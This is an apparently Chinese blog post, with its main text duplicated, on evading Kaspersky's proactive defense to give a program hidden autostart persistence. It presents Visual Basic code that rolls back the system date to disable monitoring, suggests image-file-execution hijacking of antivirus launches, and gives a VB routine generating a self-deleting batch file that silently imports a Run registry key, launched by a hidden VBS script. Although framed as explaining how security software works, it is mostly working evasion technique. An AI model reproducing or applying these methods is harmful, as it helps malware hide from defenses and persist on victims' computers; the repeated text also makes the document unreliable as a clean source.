本文介绍了多种绕过卡巴斯基主动防御的方法,包括利用系统时间漏洞、注册表修改及批处理静默安装等手段,旨在帮助理解安全软件的工作原理。
众所周知,卡巴主动防御的自启动监控超级变态,但是还是对程序有分析的。举个简单的例子来说,如果你的添加自启动的命令为shell autorun,vbhide卡巴就叫了,autorun是一个过程了,但是如果你改成这样shell autorun,vbNormalFocus ,或许就杀猪声就没了。这里说说几种现在可以让杀猪声消失的几种办法。
1,这是网上广为流传的办法,就是把启动项添加到"ALLUSERSPROFILE"/「开始」菜单/程序/启动/"文件夹下,只要你不隐藏你的文件,启动就会执行。这个超级简单!
2,也是一个广为人知的办法,修改系统时间先干掉卡巴,再执行你的操作。这也是卡巴自己搞的,只要你的 系统时间设置为以前的某个年份,监控就自动关闭。这个在程序中很容易实现,以VB程序为例
定义T1,T2为全局变量
dim T1$,t2$,M%
Private Sub Form_Load()
On Error Resume Next
M=0 '初始化timer中的M值
s1 = Date$ ’取得当前日期
s2 = "2001-1-1"
Date$ = s2'修改系统时间为较早某年
End sub
我们怎么来实现延时呢?因为修改时间后还要一段时间,卡巴才会关闭,这时我们用到timer这个东东。我们设置timer的Interva为10000(10秒),因为它时先运行一次然后再等10后循环,所以我们要把这个第一次屏蔽掉,这就是m的作用
Private Sub Timer1_Timer()
On Error Resume Next
If m = 1 Then
‘Do anything you want
Date$ = s1 '还原系统的日期
Timer1.Interval = 100
End If
m= 1’10秒之后就是每100毫秒循环一次了
End Sub
因为是主动防御,所以第一次加入自启动后,然后再监视时,比如有删除就自动添加,卡巴不会再叫。
3,就是修改注册表了,比如你修改exe,inf等关联也可以启动,但是就比较恶劣了,系统不稳定了。那么映象 劫持或许是个办法,因为有很多都有杀软,如果来映象劫持,那么试图启动杀软时就启动了你的程序,缺点是明眼人一看就知道中毒了。
4,这是我的原创办法了,^_^,就是用通过导入reg的方式来完成。思路是这样,当电脑重启时添加你的启动项。比如,以一个文件来判断是否添加启动,第一次启动时,在生成这个文件之前,就在"ALLUSERSPROFILE"/「开始」菜单/程序/启动/"生成你的批处理,这个批处理的作用就是生成reg文件,并静默导入,之后删除reg和自我。如果怕重启时露馅还可以来个vbs隐藏。
vbs可以这样写
引用内容
而bat文件呢,在vb中可以这样生成
引用内容
Private Sub runbat()
Dim reg$, tes$, test$, runbat$
reg = App.Path & "/test.reg"
runbat = App.Path & "/do.bat"
tes= App.Path & "/" & App.EXEName & ".exe"
test = Replace$(tes, "/", "//", , , vbBinaryCompare)
Open runbat For Output As #2
Print #2, "echo Windows Registry Editor Version 5.00>> " & reg
Print #2, "echo .>> " & reg
Print #2, "echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]>> " & reg
Print #2, "echo ""test""="""; test; """>> " & reg
Print #2, "regedit /s " & reg
Print #2, "del " & reg & " " & runbat
Close #2
End Sub
1,这是网上广为流传的办法,就是把启动项添加到"ALLUSERSPROFILE"/「开始」菜单/程序/启动/"文件夹下,只要你不隐藏你的文件,启动就会执行。这个超级简单!
2,也是一个广为人知的办法,修改系统时间先干掉卡巴,再执行你的操作。这也是卡巴自己搞的,只要你的 系统时间设置为以前的某个年份,监控就自动关闭。这个在程序中很容易实现,以VB程序为例
定义T1,T2为全局变量
dim T1$,t2$,M%
Private Sub Form_Load()
On Error Resume Next
M=0 '初始化timer中的M值
s1 = Date$ ’取得当前日期
s2 = "2001-1-1"
Date$ = s2'修改系统时间为较早某年
End sub
我们怎么来实现延时呢?因为修改时间后还要一段时间,卡巴才会关闭,这时我们用到timer这个东东。我们设置timer的Interva为10000(10秒),因为它时先运行一次然后再等10后循环,所以我们要把这个第一次屏蔽掉,这就是m的作用
Private Sub Timer1_Timer()
On Error Resume Next
If m = 1 Then
‘Do anything you want
Date$ = s1 '还原系统的日期
Timer1.Interval = 100
End If
m= 1’10秒之后就是每100毫秒循环一次了
End Sub
因为是主动防御,所以第一次加入自启动后,然后再监视时,比如有删除就自动添加,卡巴不会再叫。
3,就是修改注册表了,比如你修改exe,inf等关联也可以启动,但是就比较恶劣了,系统不稳定了。那么映象 劫持或许是个办法,因为有很多都有杀软,如果来映象劫持,那么试图启动杀软时就启动了你的程序,缺点是明眼人一看就知道中毒了。
4,这是我的原创办法了,^_^,就是用通过导入reg的方式来完成。思路是这样,当电脑重启时添加你的启动项。比如,以一个文件来判断是否添加启动,第一次启动时,在生成这个文件之前,就在"ALLUSERSPROFILE"/「开始」菜单/程序/启动/"生成你的批处理,这个批处理的作用就是生成reg文件,并静默导入,之后删除reg和自我。如果怕重启时露馅还可以来个vbs隐藏。
vbs可以这样写
引用内容set Cleaner=createobject("wscript.shell")
Cleaner.run "do.bat",vbhide
Cleaner.run "do.bat",vbhide
而bat文件呢,在vb中可以这样生成
引用内容Private Sub runbat()
Dim reg$, tes$, test$, runbat$
reg = App.Path & "/test.reg"
runbat = App.Path & "/do.bat"
tes= App.Path & "/" & App.EXEName & ".exe"
test = Replace$(tes, "/", "//", , , vbBinaryCompare)
Open runbat For Output As #2
Print #2, "echo Windows Registry Editor Version 5.00>> " & reg
Print #2, "echo .>> " & reg
Print #2, "echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]>> " & reg
Print #2, "echo ""test""="""; test; """>> " & reg
Print #2, "regedit /s " & reg
Print #2, "del " & reg & " " & runbat
Close #2
End Sub
扫一扫
5624
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
